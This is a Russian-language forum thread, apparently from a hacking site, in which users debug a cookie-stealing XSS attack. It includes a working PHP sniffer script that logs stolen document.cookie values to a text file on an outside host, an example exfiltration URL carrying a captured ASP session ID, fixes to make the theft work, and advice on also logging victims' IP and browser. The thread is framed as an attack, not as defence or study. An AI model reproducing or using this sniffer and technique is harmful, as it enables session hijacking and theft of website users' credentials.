Нужна помощь. Видать в запросе...
 

Народ, помогайте, запарился чета)
Вот вобщем, нашёл место куда сувать XSS.
Кидаю вот что:
Где sniff.php содержит такие строки:
И в итоге, чтобы записать мои куки, снифером, в snif.txt, меня перебрасывает на страницу:
http://www.humora.net.ru/Files/sniff.phpASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBA IEAD
где
ASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBAIEAD - это и есть document.cookie :)
Подскажите че нетак, плиз, а то не знаю уже че за фигня

у тя он записывает тока урл. Всё дело в сниффере. Ты пишешь:
http://www.humora.net.ru/Files/sniff.php+ document.cookie
И переходит на урл+куки.

Просто добавь знак вопроса:
http://www.humora.net.ru/Files/sniff.php?
В снифере замени $REQUEST_URI на "$QUERY_STRING \n"

$_server['query_string']; лучше :)

Cпасибо :) Чето я и правду запарился) Щас буду пробовать :)

Хм.. Все сделал, поставил "?" теперь это выглядит так:
===
Parse error: syntax error, unexpected '?' in /var/www/user***/html/humora.net.ru/Files/sniff.php on line 6
===
тут код снифера:
===
<?
$f = fopen("snif.txt", "a");
fwrite($f, $_server['query_string']);
fclose($f);
print("OK");
?&qt;
===
туплю чето опять :)

аа все, уже не глючит :), новый код:
===
<?php
$f = fopen("snif.txt", "a");
fwrite($f, $_server['query_string']);
fclose($f);
print("OK");
?>
===

а может вы мне поможете к этому сниферу какие нибудь фишки прикрутить :)
ну там чтобы он какую нибудь инфу о компе собирал, какой нето Ip-адрес, браузер или еще чего-нибудь по удобней :) ?

тебе нужно тока версия браузера, урл и ип. Ничё лишнего. Ну можешь ещё сделать, чтоб одинаковые записи удалялись;) В иненте полно пхп-снифферов, даже на этом сайте есть выложенный где-то... Поиском пройдись